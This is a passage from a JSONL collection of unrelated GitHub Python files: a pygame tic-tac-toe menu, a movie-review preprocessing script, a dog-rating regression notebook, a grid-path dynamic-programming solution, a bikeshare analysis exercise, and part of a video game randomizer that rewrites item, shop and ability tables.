pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n display.fill(white)\r\n message_display(\"Tic-tac-toe\", black, 250, 230, 75)\r\n\r\n button(\"Play\", green, 75, 300, 150, 50, game_loop)\r\n button(\"Quit\", red, 275, 300, 150, 50, quit_game)\r\n\r\n pygame.display.update()\r\n\r\ngame_intro()\r\npygame.quit()\r\n","repo_name":"PotatoShavings/CB-South-Coding-Club","sub_path":"tictac_pygame.py","file_name":"tictac_pygame.py","file_ext":"py","file_size_in_byte":6310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"188560399","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/28 18:24\n# @Author : panxiaotong\n# @Description : extract movie review sentiment data from mc dataset\n\nimport sys\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n 
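# not enough arguments were given, so print usage and exit\n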
print(\"extract_from_movie_review \")\n sys.exit()\n\n word_dict = {}\n with open(sys.argv[2], 'r') as f:\n for line in f:\n elements = line.strip('\\r\\n').split('\\t')\n word_dict[elements[0]] = elements[1]\n f.close()\n output_file = open(sys.argv[3], 'w')\n with open(sys.argv[1], 'r') as f:\n for idx, line in enumerate(f):\n if idx == 0:\n continue\n elements = line.strip('\\r\\n').split('\\t')\n words = [item for item in elements[2] if item.strip() != \"\"]\n sent_ids = []\n for word in words:\n sent_ids.append(\"0\" if word not in word_dict else str(word_dict[word]))\n if sent_ids.count(\"0\") != len(sent_ids):\n output_file.write(\",\".join(sent_ids) + \"\\t\" + elements[3] + \"\\n\")\n f.close()\n output_file.close()","repo_name":"Hins/prob_skip_gram","sub_path":"src/data/eval_data/extract_from_movie_review.py","file_name":"extract_from_movie_review.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36882605681","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom pandas.plotting import register_matplotlib_converters\nregister_matplotlib_converters()\nfrom scipy import stats\n\ndef to_timestamp(d):\n return d.timestamp()\n\n\n# In[2]:\n\n\ndata = pd.read_csv('dog_rates_tweets.csv',parse_dates=[1])\n\n\n# In[3]:\n\n\ndata['rating'] = data['text'].str.extract(r'(\\d+(\\.\\d+)?)/10', expand = False)[0]\n#print(data)\ndata = data.dropna()\n#print(data)\n\n\n# In[4]:\n\n\ndata['rating'] = data['rating'].astype(float)\ndata = data[data['rating'] <= 25]\n#print(data)\n\n\n# In[5]:\n\n\ndata['timestamp'] = data['created_at'].apply(to_timestamp)\nfit = stats.linregress(data['timestamp'],data['rating'])\n#print (data)\n\n\n# In[6]:\n\n\ndata['prediction'] = data['timestamp']*fit.slope + fit.intercept\n\n\n# In[7]:\n\n\nfit.slope, fit.intercept\n\n\n# In[8]:\n\n\nplt.xticks(rotation=115)\nplt.plot(data['created_at'],data['rating'],'b.',alpha=0.5)\nplt.plot(data['created_at'], data['prediction'], 'r-', linewidth=3)\nplt.show()\n\n\n# In[9]:\n\n\np = fit.pvalue\nprint('P-value for dog rates is')\nprint(p)\n\n\n# In[10]:\n\n\nresidual = data['rating'] - data['prediction']\nprint(residual)\n\n\n# In[11]:\n\n\nplt.hist(residual)\n\n","repo_name":"erwinbai/Data-Science-353","sub_path":"e7/dog-rates.py","file_name":"dog-rates.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"22582078624","text":"from collections import deque as dq\nimport sys\ninput = lambda: sys.stdin.readline().rstrip()\n\n# sys.stdin = open('in2.txt')\n# sys.stdin = open('dna/08_dynamic_programming/07-08_alibaba_and_40_thieves/in1.txt')\n\nn = int(input())\ncost = [list(map(int, input().split())) for _ in range(n)]\n\ndp = [[0]*n for _ in range(n)]\n# 0행, 0열의 값들 초기화\ndp[0][0] = cost[0][0]\nfor i in range(1, n):\n dp[0][i] = dp[0][i-1] + cost[0][i]\n dp[i][0] = dp[i-1][0] + cost[i][0]\n\n\n# Bottom-up\n# for row in range(1, n):\n# for col in range(1, n):\n# # 최단거리로 이동하므로 오른쪽 또는 아래 방향으로만 움직인다.\n# dp[row][col] = min(dp[row-1][col], dp[row][col-1]) + cost[row][col]\n# print(dp[n-1][n-1])\n\n# Top-down\n\ndef dfs(row, col):\n # Memoization\n if dp[row][col]:\n return dp[row][col]\n\n if row == 0 and col == 0:\n dp[row][col] = cost[row][col]\n elif row == 0:\n dp[row][col] = dfs(row, col-1) + cost[row][col]\n elif col == 0:\n dp[row][col] 
 dp[row][col] = dfs(row-1, col) + cost[row][col]\n else:\n dp[row][col] = min(dfs(row-1, col), dfs(row, col-1)) + cost[row][col]\n return dp[row][col]\n\n\nprint(dfs(n-1, n-1))","repo_name":"ohdnf/algorithms","sub_path":"dna/08_dynamic_programming/07-08_alibaba_and_40_thieves/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"21149376722","text":"import time\nimport pandas as pd\nimport numpy as np\n\nplace = pd.Series(['chicago.csv', 'new_york_city.csv', 'washington.csv'], ['wind', 'apple', 'rain'])\nmonths = ['january', 'february', 'march', 'april', 'may', 'june']\ndays = ['sunday', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday']\n\n\ndef load_city():\n \"\"\"\n Asks the user to specify a city to analyze.\n\n Returns:\n (str) city - filename of the city dataset to load\n \"\"\"\n city = input('\\nHi! here is some bikeshare data...\\n'\n '\\nPick your city Chicago (CH), New York (NY), Washington (WA)?\\n')\n city = city.lower()\n\n while True:\n if city == \"ny\":\n print(\"\\nWelcome to the Big Apple, enjoy the data\\n\")\n return place['apple']\n elif city == \"ch\":\n print(\"\\nWelcome to the Windy City, enjoy the data\\n\")\n return place['wind']\n elif city == \"wa\":\n print(\"\\nWelcome to the Land of Rain, enjoy the data\\n\")\n return place['rain']\n city = input(\"Select Chicago (CH), New York (NY), Washington (WA)\")\n\n\ndef load_time():\n # ask for the user time\n\n time = input('\\nSelect if you want to filter by month or day\\n')\n\n time = time.lower()\n\n if time == 'month':\n return ['month', load_month()]\n if time == 'day':\n return ['day', load_day()]\n else:\n print('\\nCan you try that again?')\n\n\ndef load_month():\n # get user input for month (all, january, february, ... , june)\n\n month = input('\\nWhich month? January, February, March, April, May, or June? Please type the full month name.\\n')\n\n month = month.lower()\n\n while True:\n if month == 'january':\n print(\"\\nHappy new year\\n\")\n return months[0]\n elif month == 'february':\n print(\"\\nHappy winter\\n\")\n return months[1]\n elif month == 'march':\n print(\"\\nHappy St. Pat\\n\")\n return months[2]\n elif month == 'april':\n print(\"\\nHappy April Showers\\n\")\n return months[3]\n elif month == 'may':\n print(\"\\nHappy May showers\\n\")\n return months[4]\n elif month == 'june':\n print(\"\\nHappy Summer\\n\")\n return months[5]\n month = input('Select January, February, March, April, May, or June? Please type the full month name.\\n')\n\n\ndef load_day():\n # get user input for day of week (all, monday, tuesday, ... sunday)\n\n day = input('\\nWhich day? 
Monday, Tuesday, Wednesday, Thursday, Friday, Saturday \\n')\n\n day = day.lower()\n\n while True:\n if day == 'sunday':\n print(\"\\nGood Sabbath\\n\")\n return days[0]\n elif day == 'monday':\n print(\"\\nHappy Monday\\n\")\n return days[1]\n elif day == 'tuesday':\n print(\"\\nHappy 2nd friday\\n\")\n return days[2]\n elif day == 'wednesday':\n print(\"\\nHappy Hump Day\\n\")\n return days[3]\n elif day == 'thursday':\n print(\"\\nTired Thursday\\n\")\n return days[4]\n elif day == 'friday':\n print(\"\\nIt's Friday\\n\")\n return days[5]\n elif day == 'saturday':\n print(\"\\nHappy Yard Day\\n\")\n return days[6]\n day = input('Select Monday, Tuesday, Wednesday, Thursday, Friday, Saturday \\n')\n\n\ndef load_data(city):\n \"\"\"\n Loads data for the specified city.\n\n Args:\n (str) city - filename of the city dataset to load\n Returns:\n df - Pandas DataFrame containing the city data with extra time columns\n \"\"\"\n print('\\nLoading the data...\\n')\n df = pd.read_csv(city)\n\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n df['month'] = df['Start Time'].dt.month\n df[\"day_of_month\"] = df[\"Start Time\"].dt.day\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n # display the most common month\n\n # display the most common day of week\n\n # convert the Start Time column to datetime\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n\n # extract hour from the Start Time column to create an hour column\n df['hour'] = df['Start Time'].dt.hour\n\n # find the most popular hour\n popular_hour = df['hour'].mode()[0]\n print('Most popular start hour:', popular_hour)\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n # display most commonly used start station\n print(\"\\n* What is the most popular start station?\\n\")\n start_station = df['Start Station'].value_counts().reset_index()['index'][0]\n print(start_station)\n\n # display most commonly used end station\n print(\"\\n* What is the most popular end station?\\n\")\n end_station = df['End Station'].value_counts().reset_index()['index'][0]\n print(end_station)\n\n # display most frequent combination of start station and end station trip\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n # display total travel time\n\n # display mean travel time\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n # Display counts of user types\n\n # Display counts of gender\n\n # Display earliest, most recent, and most common year of birth\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-' * 40)\n\n\ndef gender(df):\n gender_counts = df.groupby('Gender')['Gender'].count()\n
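 # a pandas Series of ride counts indexed by gender label\n 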
return gender_counts\n\n\ndef main():\n while True:\n city = load_city()\n time = load_time()\n # month = load_month()\n # day = load_day()\n df = load_data(city)\n\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ryanlence/Udacity","sub_path":"bikeshare/bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15164487015","text":"from randomtools.tablereader import (\n TableObject, addresses, get_activated_patches, get_open_file,\n mutate_normal, get_seed, get_global_label, tblpath,\n get_random_degree, get_difficulty, write_patch)\nfrom randomtools.utils import (\n classproperty, cached_property, utilrandom as random)\nfrom randomtools.interface import (\n run_interface, clean_and_write, finish_interface,\n get_activated_codes, get_flags, get_outfile)\nfrom collections import Counter, defaultdict\nfrom math import ceil\nfrom os import path\nfrom sys import argv\nfrom traceback import format_exc\n\n\nVERSION = '3.2'\nALL_OBJECTS = None\n\n\nclass NameMixin(TableObject):\n CHARSWAPS = {\n b'\\xff': b'\\x20',\n b'\\x8b': b'+',\n b'\\x3d': b'-',\n b'\\x8e': b'\\x27',\n b'\\x06': b'$NOCOLOR$',\n b'\\x01': b'\\n',\n b'\\x05\\x03': b'$BLUE$',\n b'\\x05\\x02': b'$RED$',\n b'>': b'.',\n }\n\n @classmethod\n def convert_to_str(self, s):\n for c in self.CHARSWAPS:\n s = s.replace(c, self.CHARSWAPS[c])\n return s.decode('ascii').rstrip('\\x00')\n\n @classmethod\n def convert_from_str(self, s):\n old_s = s\n s = s.encode('ascii')\n inverse_swaps = {}\n for (a, b) in self.CHARSWAPS.items():\n assert b not in inverse_swaps\n inverse_swaps[b] = a\n for c in inverse_swaps:\n s = s.replace(c, inverse_swaps[c])\n assert old_s == self.convert_to_str(s)\n return s\n\n def set_name(self, name):\n self.old_name\n name = self.convert_from_str(name)\n attr = self._name_attr\n length = [l for (a, l, _) in self.specsattrs if a == attr][0]\n if len(name) > length:\n print('WARNING: Name %s too long. Truncating.' 
% name)\n name = name[:length]\n while len(name) < length:\n name += b'\\xff'\n setattr(self, attr, name)\n assert len(getattr(self, attr)) == len(self.old_data[attr])\n\n @property\n def name(self):\n old_name = self.old_name\n if getattr(self, self._name_attr) == self.old_data[self._name_attr]:\n return old_name\n else:\n name = getattr(self, self._name_attr)\n return self.convert_to_str(name)\n\n @cached_property\n def old_name(self):\n for attr in self.old_data:\n if attr.endswith('_name'):\n self._name_attr = attr\n name = self.old_data[attr]\n break\n return self.convert_to_str(name)\n\n\nclass AcquireItemMixin(TableObject):\n flag = 't'\n custom_random_enable = 't'\n\n @classmethod\n def get_item_by_type_index(self, item_type, item_index):\n if item_type in ItemMixin.ITEM_TYPE_MAP:\n obj = ItemMixin.ITEM_TYPE_MAP[item_type]\n return obj.get(item_index)\n return None\n\n @property\n def item(self):\n return self.get_item_by_type_index(self.item_type, self.item_index)\n\n @property\n def old_item(self):\n return self.get_item_by_type_index(self.old_data['item_type'],\n self.old_data['item_index'])\n\n @property\n def name(self):\n item = self.item\n if item is None:\n return 'NONE'\n return item.name\n\n def mutate(self, unique=False):\n item = self.item\n\n if not hasattr(self.__class__, '_DONE_ITEMS'):\n self.__class__._DONE_ITEMS = set()\n\n for _ in range(100):\n if item is None:\n candidates = [i for i in ItemMixin.ranked_shuffle_items\n if 0 <= i.old_data['price'] <= self.value]\n item = candidates[-1]\n\n if item.rank < 0 or not item.intershuffle_valid:\n new_item = item\n break\n\n new_item = item.get_similar(random_degree=self.random_degree)\n if unique and new_item in self.__class__._DONE_ITEMS:\n continue\n self.__class__._DONE_ITEMS.add(new_item)\n break\n\n self.item_index = new_item.index\n self.item_type = ItemMixin.item_type_from_item(new_item)\n\n\nclass ItemMixin(NameMixin):\n flag = 's'\n mutate_attributes = {'price': (1, 65000)}\n\n @property\n def magic_mutate_bit_attributes(self):\n if (hasattr(self, 'equipability')\n and EquipmentObject.flag in get_flags()\n and not isinstance(self, WeaponObject)):\n return {'equipability': 0x77}\n return {}\n\n @classproperty\n def ITEM_TYPE_MAP(self):\n return {\n 0: ItemObject,\n 1: WeaponObject,\n 2: ArmorObject,\n 3: AccessoryObject,\n 4: KeyItemObject,\n }\n\n @classmethod\n def item_type_from_item(self, item):\n for k in sorted(ItemMixin.ITEM_TYPE_MAP):\n if isinstance(item, ItemMixin.ITEM_TYPE_MAP[k]):\n return k\n\n @classproperty\n def shuffle_items(self):\n if hasattr(self, '_shuffle_items'):\n return self._shuffle_items\n\n shuffle_items = (\n ItemObject.every +\n WeaponObject.every +\n ArmorObject.every +\n AccessoryObject.every\n )\n shuffle_items = [i for i in shuffle_items if i.index > 0\n and i.intershuffle_valid]\n self._shuffle_items = shuffle_items\n\n return self.shuffle_items\n\n @classproperty\n def ranked_shuffle_items(self):\n if hasattr(self, '_ranked_shuffle_items'):\n return self._ranked_shuffle_items\n\n self._ranked_shuffle_items = sorted(\n self.shuffle_items, key=lambda i: (i.rank, i.signature, i.name))\n return self.ranked_shuffle_items\n\n @property\n def rank(self):\n if hasattr(self, '_rank'):\n return self._rank\n\n sorted_items = sorted(\n self.shuffle_items, key=lambda i: (\n i.old_data['price'], i.signature, i.name))\n\n max_index = len(sorted_items)-1\n for (n, i) in enumerate(sorted_items):\n i._global_rank = n / max_index\n\n for obj_class in [ItemObject, WeaponObject,\n ArmorObject, 
AccessoryObject]:\n for i in obj_class.every:\n i._rank = -1\n\n sorted_local = [i for i in sorted_items\n if isinstance(i, obj_class)]\n max_index = len(sorted_local)-1\n for (n, i) in enumerate(sorted_local):\n i._local_rank = n / max_index\n\n for i in sorted_items:\n i._rank = (i._local_rank + i._global_rank) / 2\n\n sorted_items = sorted(\n self.shuffle_items, key=lambda i: (i._rank, i.signature, i.name))\n\n max_index = len(sorted_items)-1\n for n, i in enumerate(sorted_items):\n i._rank = n / max_index\n\n return self.rank\n\n def get_similar(self, candidates=None, override_outsider=False,\n random_degree=None):\n if candidates is None:\n candidates = ItemMixin.ranked_shuffle_items\n new_item = super().get_similar(candidates=candidates,\n override_outsider=override_outsider,\n random_degree=random_degree)\n return new_item\n\n def magic_mutate_bits(self):\n return\n\n def mutate_equipability(self):\n super().magic_mutate_bits(random_degree=EquipmentObject.random_degree)\n names = {'ryu': 0x01,\n 'nina': 0x02,\n 'garr': 0x04,\n 'rei': 0x10,\n 'momo': 0x20,\n 'peco': 0x40}\n sorted_names = sorted(names)\n if not hasattr(type(self), '_equipment_map'):\n if isinstance(self, WeaponObject):\n shuffled_names = list(sorted_names)\n random.shuffle(shuffled_names)\n equipment_map = dict(zip(sorted_names, shuffled_names))\n else:\n equipment_map = {}\n for n in sorted_names:\n equipment_map[n] = random.choice(sorted_names)\n type(self)._equipment_map = equipment_map\n\n value = self.equipability\n for n in sorted_names:\n mapped_from = type(self)._equipment_map[n]\n bitmask = names[mapped_from]\n truth = value & bitmask\n self.set_bit(n, truth)\n self.set_bit('teepo', True)\n\n def preclean(self):\n if hasattr(self, 'equipability') and self.old_data['equipability'] > 0:\n characters = ['ryu', 'nina', 'garr', 'rei', 'momo', 'peco']\n if not any(self.get_bit(c) for c in characters):\n c = random.choice(characters)\n self.set_bit(c, True)\n\n for attr in ['willpower', 'base_willpower', 'current_willpower']:\n setattr(self, attr, 0)\n\n def cleanup(self):\n if hasattr(self, 'equipability'):\n if EquipmentObject.flag not in get_flags():\n assert self.equipability == self.old_data['equipability']\n if self.old_data['equipability'] == 0:\n self.equipability = 0\n elif 'equipanything' in get_activated_codes():\n self.equipability = 0xff\n\n if self.price >= 100:\n self.price = int(float('%.2g' % (self.price*2)) / 2)\n else:\n self.price = int(float('%.1g' % (self.price*2)) / 2)\n\n\nclass DupeMixin:\n @cached_property\n def fingerprint(self):\n return str(sorted(self.old_data.items()))\n\n @cached_property\n def canonical_relative(self):\n for o in sorted(self.every, key=lambda oo: oo.index):\n if (isinstance(self, MonsterObject) and o is self and\n self.monster_name != self.old_data['monster_name']):\n continue\n if o.index >= self.index:\n return self\n if o.fingerprint == self.fingerprint:\n assert o.is_canonical\n return o\n\n @cached_property\n def is_canonical(self):\n return self.canonical_relative is self\n\n def cleanup(self):\n if hasattr(self, 'memory') and self.memory == 0xff:\n return\n if self.canonical_relative is not self:\n for attr in self.old_data:\n setattr(self, attr, getattr(self.canonical_relative, attr))\n\n\nclass EquipmentObject(TableObject):\n flag = 'q'\n flag_description = 'equippable items'\n custom_random_enable = 'q'\n\n def mutate(self):\n assert self.index == 0\n for i in ItemMixin.shuffle_items:\n if hasattr(i, 'equipability'):\n i.reseed('equip')\n 
i.mutate_equipability()\n\n\nclass MonsterAbilityObject(TableObject):\n flag = 'n'\n flag_description = 'enemy abilities'\n custom_random_enable = 'n'\n\n def mutate(self):\n for m in MonsterObject.every:\n if m.is_boss or not m.is_canonical:\n continue\n m.mutate_skills()\n\n\nclass FairyGiftObject(AcquireItemMixin): pass\nclass FairyExploreObject(AcquireItemMixin): pass\nclass FairyPrizeObject(AcquireItemMixin): pass\n\n\nclass FairyObject(DupeMixin, NameMixin):\n flag = 'c'\n\n def randomize(self):\n new_stats = []\n for i in range(4):\n f = random.choice(FairyObject.every)\n new_stats.append(f.old_data['stats'][i])\n self.stats = new_stats\n assert len(self.stats) == len(self.old_data['stats'])\n\n\nclass ItemObject(ItemMixin):\n @property\n def intershuffle_valid(self):\n WHITELIST = []\n return self.index < 0x4e or self.index in WHITELIST\n\n\nclass KeyItemObject(NameMixin): pass\nclass WeaponObject(ItemMixin):\n def cleanup(self):\n super().cleanup()\n if 'HE Shells' in self.name:\n self.set_bit('momo', True)\n\n\nclass ArmorObject(ItemMixin): pass\nclass AccessoryObject(ItemMixin): pass\n\n\nclass AbilityObject(NameMixin):\n flag = 'a'\n flag_description = 'abilities'\n custom_random_enable = 'a'\n\n HEALING_SKILL = 0\n ASSIST_SKILL = 1\n ATTACK_SKILL = 2\n EXAMINE_SKILL = 3\n\n BANNED_SKILLS = ['Head Cracker', 'Nue Stomp']\n LEVELUP_BANNED_SKILLS = ['Backhand']\n\n @property\n def intershuffle_valid(self):\n if self.rank < 0:\n return False\n return (self._levelup_rank is None\n or self.get_bit('examinable'))\n\n @property\n def is_spare_levelup_skill(self):\n if len([a for a in self.every if a.old_name == self.old_name]) == 1:\n return False\n return not self.intershuffle_valid\n\n @property\n def is_boss_skill(self):\n if hasattr(self, '_is_boss_skill'):\n return self._is_boss_skill\n\n for a in AbilityObject.every:\n a._is_boss_skill = False\n\n for m in MonsterObject.every:\n if m.is_boss:\n for a in m.abilities:\n a._is_boss_skill = True\n\n for m in MonsterObject.every:\n if not m.is_boss:\n for a in m.abilities:\n a._is_boss_skill = False\n\n return self.is_boss_skill\n\n @cached_property\n def examine_alt(self):\n if self.name == 'Noting':\n return None\n selves = [a for a in self.every if a.old_name == self.old_name]\n if len(selves) == 1:\n return self\n examinable = [a for a in selves if a.get_bit('examinable')]\n assert len(examinable) <= 1\n if examinable:\n return examinable[0]\n return None\n\n @cached_property\n def levelup_alt(self):\n if self.name == 'Noting':\n return None\n selves = [a for a in self.every if a.old_name == self.old_name]\n if len(selves) == 1:\n return self\n unexaminable = [a for a in selves if not a.get_bit('examinable')]\n if len(unexaminable) > 1:\n return sorted(unexaminable, key=lambda a: a.index)[0]\n if unexaminable:\n return unexaminable[0]\n return None\n\n @property\n def is_offense(self):\n return self.get_bit('default_target_enemy')\n\n @cached_property\n def is_utility(self):\n elements = ['fire', 'ice', 'lightning', 'earth', 'wind', 'holy']\n for e in elements:\n if self.get_bit(e):\n return False\n return self.get_bit('psionic') or self.get_bit('status')\n\n def calculate_skill_type(self):\n if self.is_utility:\n skill_type = self.ASSIST_SKILL\n elif self.is_offense:\n skill_type = self.ATTACK_SKILL\n else:\n skill_type = self.HEALING_SKILL\n return skill_type\n\n def reset_skill_type(self, skill_type=None):\n if skill_type is None:\n skill_type = self.calculate_skill_type()\n\n self.skill_type &= 0xFC\n self.skill_type |= 
skill_type\n\n @property\n def rank(self):\n if hasattr(self, '_rank'):\n return self._rank\n\n for a in AbilityObject.every:\n a._monster_rank = None\n a._levelup_rank = None\n a._master_rank = None\n\n for m in MonsterObject.ranked:\n if m.rank >= 0:\n for a in m.abilities:\n a._monster_rank = a._monster_rank or m.rank\n a._monster_rank = min(a._monster_rank, m.rank)\n\n max_level = max([l.level for l in LevelObject.every if l.ability > 0])\n for l in LevelObject.every:\n if l.ability > 0:\n a = AbilityObject.get(l.ability)\n a._levelup_rank = a._levelup_rank or l.level / max_level\n a._levelup_rank = min(a._levelup_rank, l.level / max_level)\n\n for bs in BaseStatsObject.every:\n for a in bs.all_abilities:\n a._levelup_rank = a._levelup_rank or bs.level / max_level\n a._levelup_rank = min(a._levelup_rank, bs.level / max_level)\n\n max_level = (max([max(ms.levels) for ms in MasterSkillsObject.every])\n + 1)\n for ms in MasterSkillsObject.every:\n for level, skill in zip(ms.levels, ms.skills):\n skill._master_rank = skill._master_rank or level / max_level\n skill._master_rank = min(skill._master_rank, level / max_level)\n\n name_ranks = {}\n for a in AbilityObject.every:\n ranks = []\n for attr in ['monster', 'levelup', 'master']:\n rank = getattr(a, '_%s_rank' % attr)\n if rank is not None:\n ranks.append(rank)\n\n if a.name and ranks:\n rank_value = sum(ranks) / len(ranks)\n if a.name not in name_ranks:\n name_ranks[a.name] = set([])\n name_ranks[a.name].add(rank_value)\n\n for name in ['Nothing', 'Noting']:\n if name in name_ranks:\n del(name_ranks[name])\n\n for a in AbilityObject.every:\n if a.old_name in AbilityObject.BANNED_SKILLS:\n a._rank = -1\n continue\n if a.name in name_ranks:\n ranks = name_ranks[a.name]\n a._rank = sum(ranks) / len(ranks)\n else:\n a._rank = -1\n\n return self.rank\n\n def cleanup(self):\n if self.old_name in self.BANNED_SKILLS:\n self.set_bit('examinable', False)\n\n if hasattr(self, '_rename'):\n self.set_name(self._rename)\n\n\nclass LevelObject(TableObject):\n def __repr__(self):\n s = '{0:5} {1:0>2}'.format(self.charname, self.level)\n for attr in ['hp', 'ap', 'pwr', 'dfn', 'agi', 'int']:\n value = getattr(self, attr)\n s += ' | {0}: {1}'.format(attr, value)\n return s\n\n @property\n def level(self):\n return (self.index % 99) + 1\n\n @property\n def charname(self):\n return BaseStatsObject.get(self.index // 99).name\n\n def set_stat(self, stat, value):\n for attr in self.old_data:\n old_value = getattr(self, attr)\n if attr == stat:\n setattr(self, attr, value)\n elif attr.startswith(stat):\n old_value &= 0xf\n old_value |= (value << 4)\n elif attr.endswith(stat):\n old_value &= 0xf0\n old_value |= value\n return self.old_data[attr] & 0xf\n\n def get_old_stat(self, stat):\n for attr in self.old_data:\n if attr == stat:\n return self.old_data[attr]\n elif attr.startswith(stat):\n return self.old_data[attr] >> 4\n elif attr.endswith(stat):\n return self.old_data[attr] & 0xf\n\n @property\n def pwr(self):\n return self.pwr_dfn >> 4\n\n @property\n def dfn(self):\n return self.pwr_dfn & 0xf\n\n @property\n def agi(self):\n return self.agi_int >> 4\n\n @property\n def int(self):\n return self.agi_int & 0xf\n\n\nclass ShopObject(TableObject):\n flag = 's'\n flag_description = 'shops and trades'\n custom_random_enable = 's'\n\n def __repr__(self):\n s = 'SHOP {0:0>2X} {1}\\n'.format(self.index, self.name)\n for item in self.items:\n if item.name != 'Nothing':\n s += ' {0:12} {1:>5}\\n'.format(item.name, item.price)\n return s.strip()\n\n @property\n def 
name(self):\n if hasattr(self, '_name'):\n return self._name\n\n index_names = {}\n with open(path.join(tblpath, 'names_shops.txt')) as f:\n for (i, line) in enumerate(f.readlines()):\n line = line.strip()\n index_names[i] = line\n\n for s in ShopObject.every:\n s._name = index_names[s.index].upper()\n\n return self.name\n\n @property\n def comparison(self):\n if self.items == self.old_items:\n return self.__repr__()\n\n s = 'SHOP {0:0>2X} {1:0>2X}\\n'.format(self.index, self.unknown)\n for old_item, new_item in zip(self.old_items, self.items):\n s += ' {0:12} {1:>5} -> {2:12} {3:>5}\\n'.format(\n old_item.name, old_item.price, new_item.name, new_item.price)\n return s.strip()\n\n @property\n def item_types(self):\n return [v & 0xff for v in self.item_type_item_indexes]\n\n @property\n def item_indexes(self):\n return [v >> 8 for v in self.item_type_item_indexes]\n\n @classmethod\n def items_from_indexes(self, item_types, item_indexes):\n items = []\n for item_type, item_index in zip(item_types, item_indexes):\n obj = ItemMixin.ITEM_TYPE_MAP[item_type]\n item = obj.get(item_index)\n items.append(item)\n return items\n\n @property\n def items(self):\n return self.items_from_indexes(self.item_types, self.item_indexes)\n\n @property\n def old_items(self):\n item_types = [v & 0xff for v in\n self.old_data['item_type_item_indexes']]\n item_indexes = [v >> 8 for v in\n self.old_data['item_type_item_indexes']]\n return self.items_from_indexes(item_types, item_indexes)\n\n def item_type_from_item(self, item):\n return ItemMixin.item_type_from_item(item)\n\n def set_items(self, items):\n self.item_type_item_indexes = [\n (i.index << 8) | self.item_type_from_item(i) for i in items]\n assert self.items == items\n\n @classproperty\n def item_pools(self):\n if hasattr(ShopObject, '_item_pools'):\n return ShopObject._item_pools\n\n item_pools = {}\n for i in (ItemObject.every + WeaponObject.every +\n ArmorObject.every + AccessoryObject.every):\n item_pools[i] = []\n for s in ShopObject.every:\n old_items = [i for i in s.old_items if i.index > 0]\n if i in old_items:\n item_pools[i] += old_items\n ShopObject._item_pools = item_pools\n\n return ShopObject.item_pools\n\n def mutate(self):\n random_degree = self.random_degree ** 0.5\n\n valid_items = [i for i in self.old_items if i.index > 0]\n candidates = []\n for i in valid_items:\n candidates += ShopObject.item_pools[i]\n candidates = sorted(candidates, key=lambda i: i.rank)\n\n duplicates_allowed = len(set(valid_items)) != len(valid_items)\n new_items = []\n for i in self.old_items:\n if i.index == 0:\n continue\n\n if (not isinstance(i, ItemObject) and\n random.random() < random_degree):\n my_candidates = [c for c in ItemMixin.ranked_shuffle_items\n if type(c) == type(i)]\n else:\n my_candidates = list(candidates)\n\n index = my_candidates.index(i)\n my_candidates[index] = None\n my_candidates = [c for c in my_candidates if c is not i]\n if not duplicates_allowed:\n my_candidates = [c for c in my_candidates\n if c not in new_items]\n index = my_candidates.index(None)\n my_candidates[index] = i\n assert my_candidates.count(i) == 1\n\n index = my_candidates.index(i)\n if i in new_items:\n my_candidates.remove(i)\n if my_candidates:\n max_index = len(my_candidates)-1\n index = min(max(index, 0), max_index)\n index = mutate_normal(index, 0, max_index,\n random_degree=random_degree)\n new_item = my_candidates[index]\n else:\n new_item = i\n new_items.append(new_item)\n\n self.set_items(new_items)\n\n def preclean(self):\n if self.index == 0xd:\n 
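# shop 0x0d must always stock the Flame Chrysm; if the shuffle dropped\n            # it, re-insert it (evicting a random item when the shop is full)\n            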
